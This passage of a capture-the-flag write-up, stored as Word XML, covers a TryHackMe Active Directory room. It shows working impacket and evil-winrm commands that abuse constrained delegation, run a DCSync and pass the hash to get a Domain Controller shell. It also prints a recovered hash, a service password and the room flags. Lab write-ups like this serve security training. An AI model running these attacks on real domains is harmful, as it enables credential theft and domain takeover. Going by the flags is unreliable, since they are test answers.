                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># password-reset  Person       Constrained w/ Protocol Transition  oakley/DC.COOCTUS.CORP  (x5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="1809750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Picture 1608199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08199398"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="1809750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 13 - findDelegation showing Constrained Delegation on password-reset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password-reset</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account held </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberos Constrained Delegation with Protocol Transition</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUSTED_TO_AUTH_FOR_DELEGATION</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> flag) toward </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>oakley/DC.COOCTUS.CORP</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. Protocol transition allows the account to invoke S4U2Self for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>any user</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and receive a forwardable ticket, which S4U2Proxy then presents to the delegated service. Using impacket-getST the assessor impersonated the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Domain Administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> - without the Administrator’s credentials:</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impacket-getST -spn oakley/DC.COOCTUS.CORP -impersonate Administrator \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"COOCTUS.CORP/password-reset:resetpassword" -dc-ip 10.64.148.30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># [*] Requesting S4U2self</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># [*] Requesting S4U2Proxy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># [*] Saving ticket in Administrator@oakley_DC.COOCTUS.CORP@COOCTUS.CORP.ccache</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Load the forged ticket into the environment</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>export KRB5CCNAME="Administrator@oakley_DC.COOCTUS.CORP@COOCTUS.CORP.ccache"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture 137563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75636595"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="923925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 14 - getST forging an Administrator ticket via S4U2Self / S4U2Proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc234251547"/>
      <w:r>
        <w:rPr/>
        <w:t>3.8 Domain Dominance - DCSync &amp; Pass-the-Hash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With a valid Kerberos ticket impersonating the Domain Administrator loaded into the environment, the assessor performed a DCSync attack. This abuses the directory-replication (DRSUAPI) protocol to request password data for a principal directly from the Domain Controller - without touching disk on the DC:</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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>impacket-secretsdump -k -no-pass DC.COOCTUS.CORP -just-dc-user Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture 177813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78139870"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1714500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 15 - secretsdump (DCSync) extracting the Administrator NTLM hash and Kerberos keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The Administrator NTLM hash was recovered: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>add41095f1fb0405b32f70a489de022d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This hash was then used to authenticate over WinRM via Pass-the-Hash, yielding an interactive administrative shell on the Domain Controller - no plaintext password required. The shell confirmed the COOCTUS\Administrator context on the DC:</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evil-winrm -u Administrator -H add41095f1fb0405b32f70a489de022d -i 10.64.148.30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; whoami</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cooctus\administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Picture 970020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70020494"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2286000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 16 - evil-winrm Pass-the-Hash shell as cooctus\administrator on the DC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
        </w:rPr>
        <w:t>At this point the domain was fully compromised. Every credential hash in the directory was recoverable, and administrative command execution on the Domain Controller was confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc234251548"/>
      <w:r>
        <w:rPr/>
        <w:t>3.9 Post-Exploitation - Objective &amp; Flag Collection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>From the Domain Administrator shell, the assessor completed the remaining room objectives: identifying the backdoor account planted by “Crocc Crew” and collecting the outstanding flags staged on the host. With DA rights, every file on the Domain Controller is readable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Identifying the Planted (Backdoor) Account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The room premise is that Crocc Crew planted a persistence account on the Domain Controller. Enumerating domain users - from the LDAP dump collected during enumeration (section 3.5) or from the DA shell - surfaces an account that does not fit the legitimate user base:</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net user /domain</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>however the account was discovered when reviewing the users through Evil-WinRM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Planted account: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>admCroccCrew</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  - it stands out from the standard user population (mark, Jeff, Steve, Varg, etc.) by its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>adm</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-prefixed name and its direct reference to the “Crocc Crew” threat actor. It provides the persistent domain foothold the engagement was tasked with finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5302250" cy="2514600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5302250" cy="2514600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="498475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="498475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2856865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2856865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Collecting the Privileged User &amp; Root Flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Three of the remaining flags were staged in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>C:\Shares\Home</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (the same directory served as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Home</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> SMB share). From the DA shell, the two privilege-escalation flags were read directly:</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*Evil-WinRM* PS C:\Shares\Home&gt; ls</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>#   priv-esc-2.txt   priv-esc.txt   user.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>*Evil-WinRM* PS C:\Shares\Home&gt; type priv-esc.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{0n-Y0ur-Way-t0-DA}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>*Evil-WinRM* PS C:\Shares\Home&gt; type priv-esc-2.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{Wh4t-t0-d0...Wh4t-t0-d0}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="3314700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Picture 140544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05441581"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953000" cy="3314700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
